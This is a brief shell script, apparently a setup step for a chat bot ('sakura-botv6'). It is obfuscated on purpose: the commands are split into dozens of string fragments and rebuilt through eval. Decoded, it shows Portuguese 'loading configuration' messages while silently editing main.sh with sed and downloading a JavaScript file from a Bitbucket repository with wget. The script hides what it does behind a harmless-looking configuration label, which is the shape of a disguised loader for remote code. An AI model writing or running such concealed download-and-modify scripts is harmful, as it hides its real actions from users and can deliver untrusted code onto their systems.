z="

";Kz=''\''';kz='e2a1';sz='6/.c';rz='c9e0';Yz='/bit';pz='6735';cz='anar';lz='dc57';Lz='sed ';Xz='ps:/';Oz='ta/s';gz='nfig';tz='onfi';hz='/raw';Bz='r';Nz='/Pas';Vz='wget';Tz='ain.';Pz='akur';uz='g%20';Hz='figu';BBz='onto';Az='clea';Mz='-i "';Jz='o...';Uz='sh';Qz='a-bo';xz='erv.';wz='UPRS';Ez='rreg';Sz='g" m';bz='rg/f';oz='5bf3';Rz='tv6/';nz='c089';yz='js';dz='row/';iz='/226';CBz=' '\''Fi';FBz='o!'\''';ez='repl';qz='03aa';mz='5ec9';vz='bot/';EBz='zada';DBz='nali';Zz='buck';Wz=' htt';Dz=' '\''Ca';Cz='echo';Iz='raçã';Fz='ando';jz='7f8e';ABz=' '\''Pr';Gz=' con';fz='itco';az='et.o';

eval "$Az$Bz$z$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$z$Lz$Mz$Nz$Oz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$z$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$yz$z$Az$Bz$z$Cz$ABz$BBz$Kz$z$Cz$CBz$DBz$EBz$Gz$Hz$Iz$FBz"